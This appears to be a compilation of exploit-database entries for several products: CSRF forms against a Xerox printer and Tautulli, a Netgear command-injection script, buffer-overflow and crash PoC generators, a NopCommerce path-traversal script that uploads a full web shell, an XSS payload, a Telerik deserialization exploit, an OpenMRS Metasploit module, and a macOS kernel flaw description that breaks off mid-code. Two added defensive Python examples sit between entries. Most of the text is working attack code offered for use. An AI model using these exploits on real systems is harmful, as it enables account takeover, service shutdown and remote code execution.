NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="6,1,2" />
      <input type="hidden" name="limited" value="0" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="minLength" value="1" />
      <input type="hidden" name="maxLength" value="63" />
      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
      <input type="hidden" name="isUserNameDisallowed" value="TRUE" />
      <input type="hidden" name="isNumberRequired" value="" />
      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
      <input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
      <input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
      <input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
      <input type="hidden" name="frmUserName" value="ismailtasdelen" />
      <input type="hidden" name="frmNewPassword" value="Test1234!" />
      <input type="hidden" name="frmRetypePassword" value="Test1234!" />
      <input type="hidden" name="frmOldPassword" value="undefined" />
      <input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulnerability Type : Cross-Site Request Forgery (ShutDown)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# In Tautulli v2.1.9 it has been discovered that, on installations that have no
# user login configured, the application can be reached anonymously and the
# remote media server can be shut down.

# PoC Python Script :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
 _____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution by Ismail Tasdelen
"""
print(icon)

# raw_input() returns the typed text as a string; input() on Python 2.7 would try to evaluate it
host = raw_input("[+] HOST: ")
port = raw_input("[+] PORT: ")

response = requests.get("http://" + host + ":" + port + "/" + "shutdown")  # You can also run the restart and update_check commands.

if response.status_code == 200:
    print('[✓] Success!')
elif response.status_code != 200:
    print('[✗] Unsuccessful!')
else:
    exit()

# HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
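The two CSRF forms above (Xerox xerox.set and Tautulli /shutdown) succeed for different reasons: the printer accepts a CSRFToken value replayed from an earlier capture, and Tautulli performs a state change on a plain GET with no token at all. As an added example that is not code from either product, here is a framework-neutral request gate implementing the three controls that would reject both forms: state changes only over POST, a per-session random token compared in constant time, and an Origin/Referer check against the site's own host names. The request and session are plain dicts; the header and field names are assumptions of this example.

```python
import hmac
import secrets
from urllib.parse import urlsplit


def issue_csrf_token(session):
    """Store a fresh random token in the server-side session and return it
    so the page can embed it in its form; one token per session, never static."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def _from_own_site(headers, allowed_hosts):
    """Browsers send Origin (or at least Referer) on form posts; a missing
    header is treated as foreign, and the host is compared exactly."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).hostname in allowed_hosts


def is_state_change_allowed(method, headers, form, session, allowed_hosts):
    """True only for a POST, from our own origin, carrying this session's token."""
    if method.upper() != "POST":          # a GET like Tautulli's /shutdown is refused outright
        return False
    if not _from_own_site(headers, allowed_hosts):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("CSRFToken", "")
    if not expected or not supplied:
        return False
    # Constant-time compare; a token copied from another capture, as in the
    # Xerox form, does not match the value stored for this session
    return hmac.compare_digest(expected.encode(), supplied.encode())
```

Marking the session cookie `SameSite=Lax` (or `Strict`) adds a browser-enforced layer on top of this check, but the server-side token remains the control that does not depend on client behaviour.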
-
Netgear R6400 - Remote Code Execution
# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

# PoC
#!/usr/bin/python
import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()

spl_word = "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result
-
XnView 2.49.1 - 'Research' Denial of Service (PoC)
# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.xnview.com
# Link Software : https://www.xnview.com/fr/xnview/#downloads
# Tested on OS: Windows 7

'''
Proof of Concept (PoC):
=======================
1. Download and install XnView
2. Open the XnView for Windows tools
3. Run the python script,  which will create a file (poc.txt)
4. Run the software: " Tools -> Research -> A search window opens "
5. Copy the characters in the file (poc.txt)
6. Paste the characters in the fields 'File Name' and 'In', then click on 'Research'
7. XnView for Windows crashes
'''

#!/usr/bin/python
DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
     "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
     "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
     "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

poc = DoS
file = open("poc.txt","w")   # the original had an unterminated string literal here
file.write(poc)
file.close()
print "POC Created by ZwX"
-
NopCommerce 4.2.0 - Privilege Escalation
# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS

import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"


def proxy(flag):
    return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None


def geturl(baseurl, type):
    if type == "login":
        return baseurl + "/login"
    elif type == "mv":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
    elif type == "mkdir":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
    elif type == "put":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
    elif type == "contactus":
        return baseurl + "/contactus"
    else:
        return ""


def login(email, password, url, proxy):
    res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
    cookie = res.cookies.get_dict()
    soup = BeautifulSoup(res.text, features="html.parser")
    token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
    res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
    cookies = res.cookies.get_dict()
    return { **cookies, **cookie }


def shellupload(email, password, url, proxy):
    print("[+] Trying to upload shell")
    cookies = login(email, password, url, proxy)
    # Rename Common Directory
    requests.get(geturl(url, "mv"), headers={"User-Agent" : UA}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Create Common Directory
    requests.get(geturl(url, "mkdir"), headers={"User-Agent" : UA}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Upload File into Common
    requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760", "User-Agent" : UA}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Test if it is working
    res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : UA}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    soup = BeautifulSoup(res.text, features="html.parser")
    test = soup.find("span", {"id" : "cmdResult"})
    if test is None:
        print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
    else:
        print("[+] Shell uploaded under contact us page")


def main():
    parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
    parser.add_argument('-e', '--email', required=True, type=str, help='Username')
    parser.add_argument('-p', '--password', required=True, type=str, help='Password')
    parser.add_argument('-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
    parser.add_argument('-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
    args = parser.parse_args()
    shellupload(args.email, args.password, args.url, proxy(args.proxy))


if __name__ == '__main__':
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    main()
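Every step of the script above goes through the `d` parameter of RoxyFileman's ProcessRequest, whose `..%2F` segments walk out of the uploads directory and into the application's Views folder. The check the file manager needed is to resolve the requested directory against the upload root and refuse anything that lands outside it. The following is an added example, not NopCommerce or RoxyFileman code; the root path is a constructed value and the function is written for a POSIX runtime (the page's target is IIS, where the same realpath-and-prefix logic applies with `os.sep` as backslash).

```python
import os
from urllib.parse import unquote


class PathTraversal(ValueError):
    """Raised when a client-supplied path would leave the upload root."""


def resolve_under_root(root, user_path):
    """Map a client-supplied directory to an absolute path inside root.

    The value arrives URL-encoded ('..%2F'), so it is decoded first so the
    check sees the same string the filesystem would. A leading slash is
    treated as relative to root, mirroring '/images/uploaded/...' above.
    """
    root_real = os.path.realpath(root)
    decoded = unquote(user_path)
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip("/\\")))
    if candidate != root_real and not candidate.startswith(root_real + os.sep):
        raise PathTraversal("path escapes upload root: %r" % user_path)
    return candidate


def is_contained(root, user_path):
    """True if user_path resolves to root or somewhere beneath it."""
    try:
        resolve_under_root(root, user_path)
        return True
    except PathTraversal:
        return False
```

Resolving with `realpath` rather than only normalising the string also catches symbolic links that point out of the root, which a plain `..` filter would miss.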
-
Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368

Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.

PoC:
Payload: ?!'><sVg/OnLoAD=alert`1`//
Vulnerable URL: http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//

Solution:
Update to the latest version released by vendor.
-
AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.avs4you.com/
# Link Software : http://www.avs4you.com/avs-audio-converter.aspx
# Tested on OS: Windows 7

'''
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official AVS Audio Converter.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue.

Analyze Registers:
==================
(1e74.1b78): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000
eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
42424242 ??              ???
0:000> !exchain
0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d)
0012fa30: 42424242
Invalid exception stack at 41414141

Note: EIP & ECX overwritten

Proof of Concept (PoC):
=======================
1. Download and install AVS Audio Converter
2. Open the AVS Audio Converter
3. Run the python script, which will create a file (poc.txt)
4. Copy and paste the characters found in the file (poc.txt) in the field "Exit folder"
5. Click on browse
6. EIP overwritten
'''

#!/usr/bin/python
buffer = "\x41" * 264
a = "\x42" * 4
b = "\x43" * 1000
poc = buffer + a + b
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"
-
Telerik UI - Remote Code Execution via Insecure Deserialization
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).

Install

git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
python3 -m venv env
source env/bin/activate
pip3 install -r requirements.txt

Requirements

This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.

Usage

Compile mixed mode assembly DLL payload

In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.

build_dll.bat sleep.c

Upload and load payload into application via insecure deserialization

Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.

python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll

[*] Local payload name:  sleep_2019121205271355_x86.dll
[*] Destination folder:  C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll

{'fileInfo': {'ContentLength': 75264,
              'ContentType': 'application/octet-stream',
              'DateJson': '1970-01-01T00:00:00.000Z',
              'FileName': '1576142987.918625.dll',
              'Index': 0},
 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
                                     'Telerik.Web.UI, Version=<VERSION>, '
                                     'Culture=neutral, '
                                     'PublicKeyToken=<TOKEN>',
              'TempFileName': '1576142987.918625.dll'}}

[*] Triggering deserialization...

<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...

[*] Response time: 13.01 seconds

In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).

Thanks

@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip
-
OpenMRS - Java Deserialization RCE (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenMRS Java Deserialization RCE',
      'Description'    => %q(
        OpenMRS is an open-source platform that supplies users with a
        customizable medical record system. There exists an object
        deserialization vulnerability in the `webservices.rest` module used
        in OpenMRS Platform. Unauthenticated remote code execution can be
        achieved by sending a malicious XML payload to a Rest API endpoint
        such as `/ws/rest/v1/concept`. This module uses an XML payload
        generated with Marshalsec that targets the ImageIO component of the
        XStream library. Tested on OpenMRS Platform `v2.1.2` and `v2.21`
        with Java 8 and Java 9.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Serra', # Vuln Discovery and PoC
          'mpgn',          # PoC
          'Shelby Pace'    # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2018-19276' ],
          [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
          [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
          [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
        ],
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [ 'Linux',
            {
              'Arch'            => [ ARCH_X86, ARCH_X64 ],
              'Platform'        => [ 'unix', 'linux' ],
              'CmdStagerFlavor' => 'printf'
            }
          ]
        ],
      'DisclosureDate' => '2019-02-04',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(8081),
        OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
      ])

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  def check
    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')

    response = res.get_html_document
    version = response.at('body//h3')
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text

    version_no = version.text
    version_no = version_no.match(/\d+\.\d+\.\d*/)
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no

    version_no = Gem::Version.new(version_no)
    if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
      return CheckCode::Appears("OpenMRS platform version: #{version_no}")
    end

    CheckCode::Safe
  end

  def format_payload
    payload_data = payload.encoded.to_s.encode(xml: :text)
    payload_arr = payload_data.split(' ', 3)
    payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
  end

  def read_payload_data(payload_cmd)
    # payload generated with Marshalsec
    erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
    payload_data = File.binread(erb_path)
    payload_data = ERB.new(payload_data).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
  end

  def execute_command(cmd, opts={})
    cmd = cmd.encode(xml: :text)
    xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
    rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
    payload_data = read_payload_data(xml_data)

    send_request_cgi(
      'method'  => 'POST',
      'uri'     => rest_uri,
      'headers' => { 'Content-Type' => 'text/xml' },
      'data'    => payload_data
    )
  end

  def exploit
    chk_status = check
    print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
    unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'])
      fail_with(Failure::NoTarget, 'Target is not vulnerable')
    end

    cmds = generate_cmdstager(:concat_operator => '&&')
    print_status('Sending payload...')
    cmds.first.split('&&').map { |cmd| execute_command(cmd) }
  end
end
-
macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()
The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges.

The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code:

static int
wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
{
	...
	error = falloc(p, &fp, &indx, ctx);
	if (error)
		goto cleanup;
	fp_alloc_successful = true;
	...
	proc_fdlock(p);
	procfdtbl_releasefd(p, indx, NULL);
	fp_drop(p, indx, fp, 1);
	proc_fdunlock(p);
	...
	error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
	if (error)
		goto cleanup;
	...
cleanup:
	if (error) {
		if (fp_alloc_successful)
			fp_free(p, indx, fp);
		...
	}

